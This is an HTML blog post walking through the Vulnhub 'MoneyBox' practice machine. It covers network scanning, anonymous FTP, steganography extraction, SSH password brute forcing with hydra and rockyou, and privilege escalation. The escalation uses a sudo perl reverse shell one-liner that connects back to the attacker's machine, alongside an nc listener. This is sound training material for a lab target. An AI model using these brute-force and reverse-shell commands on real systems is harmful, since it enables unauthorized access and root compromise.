<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="[MONEYBOX]Difficulty: [Medium→Easy]Score: 5.5&#x2F;10">
<meta property="og:type" content="article">
<meta property="og:title" content="Vulnhub MoneyBox">
<meta property="og:url" content="http://kelpie.top/post/Virtual%20Attack%20[1].html">
<meta property="og:site_name" content="Kelpie Blog">
<meta property="og:description" content="[MONEYBOX]Difficulty: [Medium→Easy]Score: 5.5&#x2F;10">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fu5iUKxah6V9LK_lkX4QCdD6L3Iz.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FmbBJ5muDhRhPRkds4XAbYqk6Vb1.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FrpnHP7Nl1E0SAmo1diUtNlfEbVX.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FtxQ1TIRsI4UBX0rwAbVGs47fVF6.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fl7rOrFRwl9m1bu_OH6THfzYL9Qg.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FhWgFbmJOOAlQhty_hsodSdcsnQv.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fg0SiG3aXzkWx3pIwoq4pC45JfXn.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fugur8wgKok0Q9CJjURaLOYEmQTD.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FrA-qepN01_PNH_JF_oj4EXEEOCF.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FtZdWF7XPU7jfQs0IDU1mpSsfjw_.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FnclVtlzuStoVcXY6Cs1JqQsJOKb.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fs7zARNelI-vvJ1ftgt-xVEQCkQN.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FrnJfv4Na7JcH0wD8OTl181CN3KC.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fn_WH6muD0cMYVvucZ9PxVgjBPRo.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fmku3pLFMwPagcBomslzPYKMAXtd.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FnpQwvsdbOKmzC3-lBt-K1Q3V90Q.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FqigzyMRrdVxbgHA-97gS3d5YLaX.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FqsC-pamGSxUa8wahgV0tnH_9h97.png">
<meta property="og:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fr05cFNAecM3MQBAdqEzptLjzU-W.png">
<meta property="article:published_time" content="2022-01-18T22:18:00.000Z">
<meta property="article:modified_time" content="2024-04-10T09:43:13.342Z">
<meta property="article:author" content="l3vi4th4n">
<meta property="article:tag" content="Penetration Test">
<meta property="article:tag" content="Vulnhub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fu5iUKxah6V9LK_lkX4QCdD6L3Iz.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Vulnhub MoneyBox</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/k3lpi3b4nsh33">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/post/Virtual%20Attack%20%5B2%5D.html"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://kelpie.top/post/Virtual%20Attack%20[1].html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&text=Vulnhub MoneyBox"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&is_video=false&description=Vulnhub MoneyBox"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Vulnhub MoneyBox&body=Check out this article: http://kelpie.top/post/Virtual%20Attack%20[1].html"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&name=Vulnhub MoneyBox&description=&lt;h1 id=&#34;MONEYBOX&#34;&gt;&lt;a href=&#34;#MONEYBOX&#34; class=&#34;headerlink&#34; title=&#34;[MONEYBOX]&#34;&gt;&lt;/a&gt;[MONEYBOX]&lt;/h1&gt;&lt;p&gt;Difficulty: [Medium→Easy]&lt;br&gt;Score: 5.5&amp;#x2F;10&lt;/p&gt;
&lt;hr&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://kelpie.top/post/Virtual%20Attack%20[1].html&t=Vulnhub MoneyBox"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#MONEYBOX"><span class="toc-number">1.</span> <span class="toc-text">[MONEYBOX]</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text"></span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Target"><span class="toc-number">3.</span> <span class="toc-text">Target</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Process"><span class="toc-number">4.</span> <span class="toc-text">Process</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-Local-Network-Discovering"><span class="toc-number">4.1.</span> <span class="toc-text">1. Local Network Discovering</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Subnet-discover"><span class="toc-number">4.1.1.</span> <span class="toc-text">Subnet discover</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Port-Scan"><span class="toc-number">4.1.2.</span> <span class="toc-text">Port Scan</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-common-script-Scan"><span class="toc-number">4.1.3.</span> <span class="toc-text">Nmap common script Scan</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-Web-Application-Exploit"><span class="toc-number">4.2.</span> <span class="toc-text">2. Web Application Exploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-path-brute-force-enumeration"><span class="toc-number">4.2.1.</span> <span class="toc-text">Web-path brute force enumeration</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Ctrl-u-Inspect-the-elements"><span class="toc-number">4.2.2.</span> <span class="toc-text">Ctrl+u Inspect the elements</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-Steganography"><span class="toc-number">4.3.</span> <span class="toc-text">3. Steganography</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Extract-the-information-from-the-picture"><span class="toc-number">4.3.1.</span> <span class="toc-text">Extract the information from the picture</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-Brute-Force-SSH"><span class="toc-number">4.4.</span> <span class="toc-text">4. Brute Force SSH</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap"><span class="toc-number">4.4.1.</span> <span class="toc-text">Nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hydra"><span class="toc-number">4.4.2.</span> <span class="toc-text">Hydra</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-Command-and-Control"><span class="toc-number">4.5.</span> <span class="toc-text">5. Command and Control</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Renu-User-History-Collection"><span class="toc-number">4.5.1.</span> <span class="toc-text">Renu User History Collection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-ways-to-get-lily-flag"><span class="toc-number">4.5.2.</span> <span class="toc-text">2 ways to get lily flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Lily-User-information-Collection"><span class="toc-number">4.5.3.</span> <span class="toc-text">Lily User information Collection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Cat-the-root-flag"><span class="toc-number">4.5.4.</span> <span class="toc-text">Cat the root flag</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Summary"><span class="toc-number">5.</span> <span class="toc-text">Summary</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Vulnhub MoneyBox
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">l3vi4th4n</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-18T22:18:00.000Z" class="dt-published" itemprop="datePublished">2022-01-18</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Penetration-Test/">Penetration Test</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Penetration-Test/" rel="tag">Penetration Test</a>, <a class="p-category" href="/tags/Vulnhub/" rel="tag">Vulnhub</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="MONEYBOX"><a href="#MONEYBOX" class="headerlink" title="[MONEYBOX]"></a>[MONEYBOX]</h1><p>Difficulty: [Medium→Easy]<br>Score: 5.5&#x2F;10</p>
<hr>
<span id="more"></span>

<h1 id=""><a href="#" class="headerlink" title=""></a></h1><h1 id="Target"><a href="#Target" class="headerlink" title="Target"></a>Target</h1><ol>
<li>3 flags</li>
<li>Root privilege</li>
</ol>
<h1 id="Process"><a href="#Process" class="headerlink" title="Process"></a>Process</h1><h2 id="1-Local-Network-Discovering"><a href="#1-Local-Network-Discovering" class="headerlink" title="1. Local Network Discovering"></a>1. Local Network Discovering</h2><h3 id="Subnet-discover"><a href="#Subnet-discover" class="headerlink" title="Subnet discover"></a>Subnet discover</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> arp-scan <span class="token parameter variable">-I</span> eth0 <span class="token parameter variable">-l</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fu5iUKxah6V9LK_lkX4QCdD6L3Iz.png"></p>
<h3 id="Port-Scan"><a href="#Port-Scan" class="headerlink" title="Port Scan"></a>Port Scan</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> nmap -p- <span class="token number">192.168</span>.1.105<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>Port 21, 22, 5000 open<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FmbBJ5muDhRhPRkds4XAbYqk6Vb1.png"><br>Identify Port Service</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> nmap -p21,22,5000 <span class="token parameter variable">-sV</span> <span class="token number">192.168</span>.1.105<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FrpnHP7Nl1E0SAmo1diUtNlfEbVX.png"></p>
<h3 id="Nmap-common-script-Scan"><a href="#Nmap-common-script-Scan" class="headerlink" title="Nmap common script Scan"></a>Nmap common script Scan</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> nmap -p21,22,80 <span class="token parameter variable">-sC</span> <span class="token number">192.168</span>.1.105<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>We found that we can login ftp service with <strong>Anonymous</strong><br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FtxQ1TIRsI4UBX0rwAbVGs47fVF6.png"><br>Login the ftp service download the image<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fl7rOrFRwl9m1bu_OH6THfzYL9Qg.png"></p>
<h2 id="2-Web-Application-Exploit"><a href="#2-Web-Application-Exploit" class="headerlink" title="2. Web Application Exploit"></a>2. Web Application Exploit</h2><h3 id="Web-path-brute-force-enumeration"><a href="#Web-path-brute-force-enumeration" class="headerlink" title="Web-path brute force enumeration"></a>Web-path brute force enumeration</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> dirsearch <span class="token parameter variable">-u</span> http://192.168.1.105<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FhWgFbmJOOAlQhty_hsodSdcsnQv.png"><br>Check it out. There’s not useful information.<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fg0SiG3aXzkWx3pIwoq4pC45JfXn.png"></p>
<h3 id="Ctrl-u-Inspect-the-elements"><a href="#Ctrl-u-Inspect-the-elements" class="headerlink" title="Ctrl+u Inspect the elements"></a>Ctrl+u Inspect the elements</h3><p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fugur8wgKok0Q9CJjURaLOYEmQTD.png"><br>found the special directory<br>Inspect elements under the S3cr3t-T3xt<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FrA-qepN01_PNH_JF_oj4EXEEOCF.png"></p>
<h2 id="3-Steganography"><a href="#3-Steganography" class="headerlink" title="3. Steganography"></a>3. Steganography</h2><p>The image must be useful which we should know what information hide in it.</p>
<h3 id="Extract-the-information-from-the-picture"><a href="#Extract-the-information-from-the-picture" class="headerlink" title="Extract the information from the picture"></a>Extract the information from the picture</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">strings trytofind.jpg<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FtZdWF7XPU7jfQs0IDU1mpSsfjw_.png"></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">steghide info trytofind.jpg
steghide extract <span class="token parameter variable">-sf</span> trytofind.jpg<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>Input the password we found <strong>3xtr4ctd4t4</strong><br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FnclVtlzuStoVcXY6Cs1JqQsJOKb.png"></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">cat</span> the data.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fs7zARNelI-vvJ1ftgt-xVEQCkQN.png"></p>
<h2 id="4-Brute-Force-SSH"><a href="#4-Brute-Force-SSH" class="headerlink" title="4. Brute Force SSH"></a>4. Brute Force SSH</h2><p>Preparation dictionary</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> renu <span class="token operator">></span> user.txt
<span class="token function">cp</span> /usr/share/wordlists/rockyou.txt.gz <span class="token builtin class-name">.</span>
gunzip rockyou.txt.gz<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><strong>What tools are most effective?</strong><br>Here two tools I used:</p>
<h3 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> nmap <span class="token parameter variable">--script</span> ssh-brute --script-args <span class="token assign-left variable">userdb</span><span class="token operator">=</span>user.txt,passdb<span class="token operator">=</span>rockyou.txt <span class="token number">192.168</span>.1.105<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="Hydra"><a href="#Hydra" class="headerlink" title="Hydra"></a>Hydra</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">hydra <span class="token parameter variable">-l</span> renu <span class="token parameter variable">-P</span> rockyou.txt <span class="token number">192.168</span>.1.105 <span class="token function">ssh</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>got the renu password: 987654321<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FrnJfv4Na7JcH0wD8OTl181CN3KC.png"></p>
<h2 id="5-Command-and-Control"><a href="#5-Command-and-Control" class="headerlink" title="5. Command and Control"></a>5. Command and Control</h2><p>Login user renu with ssh service<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fn_WH6muD0cMYVvucZ9PxVgjBPRo.png"><br>get the first flag of renu<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fmku3pLFMwPagcBomslzPYKMAXtd.png"></p>
<h3 id="Renu-User-History-Collection"><a href="#Renu-User-History-Collection" class="headerlink" title="Renu User History Collection"></a>Renu User History Collection</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">History<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>Oh damn! We found renu copy lily ssh private key.<br><strong>That mean renu password is the same as lily.</strong><br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FnpQwvsdbOKmzC3-lBt-K1Q3V90Q.png"></p>
<h3 id="2-ways-to-get-lily-flag"><a href="#2-ways-to-get-lily-flag" class="headerlink" title="2 ways to get lily flag"></a>2 ways to get lily flag</h3><ol>
<li>Switch user<br>The same password</li>
</ol>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">su</span> <span class="token parameter variable">-u</span> lily or <span class="token function">ssh</span> login<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ol>
<li>Cat the lily flag directly<br>Maybe the same password the same localgroup? Just try it.</li>
</ol>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">cat</span> /home/lily/user2.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ol>
<li><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FqigzyMRrdVxbgHA-97gS3d5YLaX.png"><br>Oh that work!</li>
</ol>
<h3 id="Lily-User-information-Collection"><a href="#Lily-User-information-Collection" class="headerlink" title="Lily User information Collection"></a>Lily User information Collection</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> <span class="token parameter variable">-l</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FqsC-pamGSxUa8wahgV0tnH_9h97.png"><br>**Oh how lucky we are. We can use perl to make ****root privilege reverse shell**<br>local machine listening on port 5555</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">nc</span> <span class="token parameter variable">-lnvp</span> <span class="token number">5555</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>Make the perl reverse shell</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> perl <span class="token parameter variable">-e</span> <span class="token string">'use Socket;$i="&#123;local machineIP&#125;";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,">&amp;S");open(STDOUT,">&amp;S");open(STDERR,">&amp;S");exec("/bin/sh -i");&#125;;'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="Cat-the-root-flag"><a href="#Cat-the-root-flag" class="headerlink" title="Cat the root flag"></a>Cat the root flag</h3><p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fr05cFNAecM3MQBAdqEzptLjzU-W.png"></p>
<h1 id="Summary"><a href="#Summary" class="headerlink" title="Summary"></a>Summary</h1><hr>
<p>The hard and important part is found the door to get shell. Steganography is the newest part I ever had, i think the virtual machine is CTF style. Easy privilege escalation, If privilege escalation be more dificult, the total dificulty will be raised to a higher level, maybe Medium→High or just medium. It’s my first time to use perl reverse shell. Here is a ‘E’ parameter to contain the shellcode.</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/k3lpi3b4nsh33">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#MONEYBOX"><span class="toc-number">1.</span> <span class="toc-text">[MONEYBOX]</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text"></span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Target"><span class="toc-number">3.</span> <span class="toc-text">Target</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Process"><span class="toc-number">4.</span> <span class="toc-text">Process</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-Local-Network-Discovering"><span class="toc-number">4.1.</span> <span class="toc-text">1. Local Network Discovering</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Subnet-discover"><span class="toc-number">4.1.1.</span> <span class="toc-text">Subnet discover</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Port-Scan"><span class="toc-number">4.1.2.</span> <span class="toc-text">Port Scan</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-common-script-Scan"><span class="toc-number">4.1.3.</span> <span class="toc-text">Nmap common script Scan</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-Web-Application-Exploit"><span class="toc-number">4.2.</span> <span class="toc-text">2. Web Application Exploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-path-brute-force-enumeration"><span class="toc-number">4.2.1.</span> <span class="toc-text">Web-path brute force enumeration</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Ctrl-u-Inspect-the-elements"><span class="toc-number">4.2.2.</span> <span class="toc-text">Ctrl+u Inspect the elements</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-Steganography"><span class="toc-number">4.3.</span> <span class="toc-text">3. Steganography</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Extract-the-information-from-the-picture"><span class="toc-number">4.3.1.</span> <span class="toc-text">Extract the information from the picture</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-Brute-Force-SSH"><span class="toc-number">4.4.</span> <span class="toc-text">4. Brute Force SSH</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap"><span class="toc-number">4.4.1.</span> <span class="toc-text">Nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hydra"><span class="toc-number">4.4.2.</span> <span class="toc-text">Hydra</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-Command-and-Control"><span class="toc-number">4.5.</span> <span class="toc-text">5. Command and Control</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Renu-User-History-Collection"><span class="toc-number">4.5.1.</span> <span class="toc-text">Renu User History Collection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-ways-to-get-lily-flag"><span class="toc-number">4.5.2.</span> <span class="toc-text">2 ways to get lily flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Lily-User-information-Collection"><span class="toc-number">4.5.3.</span> <span class="toc-text">Lily User information Collection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Cat-the-root-flag"><span class="toc-number">4.5.4.</span> <span class="toc-text">Cat the root flag</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Summary"><span class="toc-number">5.</span> <span class="toc-text">Summary</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://kelpie.top/post/Virtual%20Attack%20[1].html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&text=Vulnhub MoneyBox"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&is_video=false&description=Vulnhub MoneyBox"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
